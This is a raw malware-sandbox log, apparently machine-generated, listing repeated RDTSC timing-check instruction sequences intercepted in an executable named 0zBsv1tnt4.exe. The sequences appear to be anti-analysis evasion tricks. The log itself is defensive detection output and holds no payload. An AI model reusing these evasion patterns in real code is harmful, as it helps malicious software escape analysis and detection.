Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA6E7 second address: BBA702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA702 second address: BBA72A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 ja 00007FC22D01ECC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007FC22D01ECD2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA72A second address: BBA738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA738 second address: BBA73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA73E second address: BBA742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA742 second address: BBA746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB9B25 second address: BB9B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB9B2E second address: BB9B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB9B34 second address: BB9B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBBE9A second address: BBBEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBBEA3 second address: BBBEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC4170 second address: BC4187 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC22D01ECCDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC4187 second address: BC418B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2181 second address: BC2187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2187 second address: BC218D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC218D second address: BC2195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2757 second address: BC2775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007FC22CC1B8B2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2CF9 second address: BC2CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2CFE second address: BC2D0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007FC22CC1B8A6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2D0E second address: BC2D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC32C1 second address: BC32C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC32C7 second address: BC3306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FC22D01ECD3h 0x00000010 jmp 00007FC22D01ECCEh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007FC22D01ECC6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC3306 second address: BC330A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC330A second address: BC3310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC3310 second address: BC3333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC22CC1B8B8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C1A second address: BC8C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C2B second address: BC8C39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C39 second address: BC8C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C3F second address: BC8C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C45 second address: BC8C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCBE06 second address: BCBE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC22CC1B8A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCBF5B second address: BCBF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCBF5F second address: BCBF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC22CC1B8A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC09D second address: BCC0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC0A3 second address: BCC0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B7h 0x00000009 popad 0x0000000a jmp 00007FC22CC1B8B1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC222 second address: BCC252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC22D01ECD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC37B second address: BCC381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC655 second address: BCC65C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD45E0 second address: BD45E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD329A second address: BD32A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD32A0 second address: BD32A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD2341 second address: BD2358 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC22D01ECCEh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD2358 second address: BD2370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD9D8D second address: BD9D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD9D91 second address: BD9DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD9DAD second address: BD9DC9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC22D01ECD2h 0x00000008 jc 00007FC22D01ECE5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BDCC66 second address: BDCC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BDCC6A second address: BDCC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE09D4 second address: BE09DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE09DA second address: BE09DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE09DE second address: BE0A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC22CC1B8C0h 0x0000000c jmp 00007FC22CC1B8B8h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jc 00007FC22CC1B8C0h 0x0000001a pushad 0x0000001b jc 00007FC22CC1B8A6h 0x00000021 jng 00007FC22CC1B8A6h 0x00000027 jc 00007FC22CC1B8A6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2E3E second address: BE2E57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2C92 second address: BE2CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2CAC second address: BE2CC2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2CC2 second address: BE2CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2CC8 second address: BE2CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF87E second address: BEF882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF882 second address: BEF886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF886 second address: BEF8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC22CC1B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC22CC1B8B0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF8A2 second address: BEF8F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD8h 0x00000008 jmp 00007FC22D01ECD9h 0x0000000d jmp 00007FC22D01ECD8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF42A second address: BEF43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8ADh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF43D second address: BEF441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFAAFB second address: BFAB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFAB05 second address: BFAB0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFAB0A second address: BFAB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFC19D second address: BFC1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF2F second address: C0DF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FC22CC1B8A6h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF5A second address: C0DF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF5E second address: C0DF6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF6C second address: C0DF8F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC22D01ECD9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF8F second address: C0DF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0C862 second address: C0C884 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC22D01ECC6h 0x00000008 jmp 00007FC22D01ECD3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0C884 second address: C0C88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0CB14 second address: C0CB1E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22D01ECCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0CDB1 second address: C0CDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 jl 00007FC22CC1B8AAh 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC22CC1B8B7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DC78 second address: C0DC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C11607 second address: C11612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BBEB second address: C2BC18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC22D01ECCEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECD9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BC18 second address: C2BC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BA5F second address: C2BA76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BA76 second address: C2BA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d ja 00007FC22CC1B8BAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2BA9D second address: C2BAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2E813 second address: C2E81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2E81D second address: C2E82B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C2E82B second address: C2E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22CC1B8B1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C30873 second address: C30880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FC22D01ECC6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C30880 second address: C30884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C30884 second address: C3088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C3088A second address: C3088F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C303F5 second address: C303F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C303F9 second address: C3040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC22CC1B8ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C3040C second address: C3041A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C3041A second address: C30420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45735 second address: C4573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45884 second address: C4588B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4588B second address: C45891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45891 second address: C45896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C45896 second address: C4589C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C4589C second address: C458A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
